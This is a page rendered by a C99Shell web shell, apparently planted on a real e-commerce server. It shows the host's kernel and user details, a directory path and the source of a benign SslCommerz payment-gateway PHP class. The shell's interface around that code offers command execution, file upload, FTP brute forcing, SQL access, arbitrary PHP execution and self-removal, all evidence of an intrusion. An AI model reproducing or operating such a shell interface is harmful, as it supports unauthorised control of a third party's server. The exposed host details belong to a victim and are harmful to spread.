!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/Modules/SslCommerz/Library/SslCommerz/   drwxr-xr-x
Free 26.35 GB of 117.98 GB (22.34%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     AbstractSslCommerz.php (4.15 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
namespace Modules\SslCommerz\Library\SslCommerz;

abstract class 
AbstractSslCommerz implements SslCommerzInterface
{
    protected 
$apiUrl;
    protected 
$storeId;
    protected 
$storePassword;

    
/**
     * Set Store Id
     *
     * @param string $storeID
     * @return void
     */
    
protected function setStoreId($storeID)
    {
        
$this->storeId $storeID;
    }

    
/**
     * Get Store Id
     *
     * @return string $this->storeId
     */
    
protected function getStoreId()
    {
        return 
$this->storeId;
    }

    
/**
     * Set Store Password
     *
     * @param string $storePassword
     * @return void
     */
    
protected function setStorePassword($storePassword)
    {
        
$this->storePassword $storePassword;
    }

    
/**
     * Get Store Password
     *
     * @return string $this->storePassword
     */
    
protected function getStorePassword()
    {
        return 
$this->storePassword;
    }

    
/**
     * Set API Url
     *
     * @param string $url
     * @return void
     */
    
protected function setApiUrl($url)
    {
        
$this->apiUrl $url;
    }

    
/**
     * Get API Url
     *
     * @return string $this->apiUrl
     */
    
protected function getApiUrl()
    {
        return 
$this->apiUrl;
    }

    
/**
     * Call API
     * @param $data
     * @param array $header
     * @param bool $setLocalhost
     * @return bool|string
     */
    
public function callToApi($data$header = [], $setLocalhost false)
    {
        
$curl curl_init();
        if (!
$setLocalhost) {
            
curl_setopt($curlCURLOPT_SSL_VERIFYPEERtrue);
            
curl_setopt($curlCURLOPT_SSL_VERIFYHOST2); // The default value for this option is 2. It means, it has to have the same name in the certificate as is in the URL you operate against.
        
} else {
            
curl_setopt($curlCURLOPT_SSL_VERIFYPEERfalse);
            
curl_setopt($curlCURLOPT_SSL_VERIFYHOST0); // When the verify value is 0, the connection succeeds regardless of the names in the certificate.
        
}

        
curl_setopt($curlCURLOPT_URL$this->getApiUrl());
        
curl_setopt($curlCURLOPT_HEADER0);
        
curl_setopt($curlCURLOPT_HTTPHEADER$header);
        
curl_setopt($curlCURLOPT_TIMEOUT60);
        
curl_setopt($curlCURLOPT_RETURNTRANSFER1);

        
curl_setopt($curlCURLOPT_POST1);
        
curl_setopt($curlCURLOPT_POSTFIELDS$data);

        
$response curl_exec($curl);
        
$err curl_error($curl);
        
$code curl_getinfo($curlCURLINFO_HTTP_CODE);
        
$curlErrorNo curl_errno($curl);
        
curl_close($curl);

        if (
$code == 200 & !($curlErrorNo)) {
            return 
$response;
        }
        return 
__('Failed to connect with SSL Commerz API.');
    }

    
/**
     * Format Response Data
     *
     * @param $response
     * @param string $type
     * @param string $pattern
     * @return false|mixed|string
     */
    
public function formatResponse($response$type 'checkout'$pattern 'json')
    {
        
$sslcz json_decode($responsetrue);

        if (
$type != 'checkout') {
            return 
$sslcz;
        }

        
$response json_encode(['status' => 'fail''data' => null'message' => $sslcz['failedreason']]);
        if (isset(
$sslcz['GatewayPageURL']) && $sslcz['GatewayPageURL'] != "") {
            
// this is important to show the popup, return or echo to send json response back
            
$successStatus 'success';
            if (
$this->getApiUrl() != null && $this->getApiUrl() == 'https://securepay.sslcommerz.com') {
                
$successStatus 'SUCCESS';
            }
            
$response json_encode(['status' => $successStatus'data' => $sslcz['GatewayPageURL'], 'logo' => $sslcz['storeLogo']]);
        }

        return 
$response;
    }

    
/**
     * Redirect
     *
     * @param $url
     * @param bool $permanent
     * @return void
     */
    
public function redirect($url$permanent false)
    {
        
header('Location: ' $urltrue$permanent 301 302);
        exit();
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0047 ]--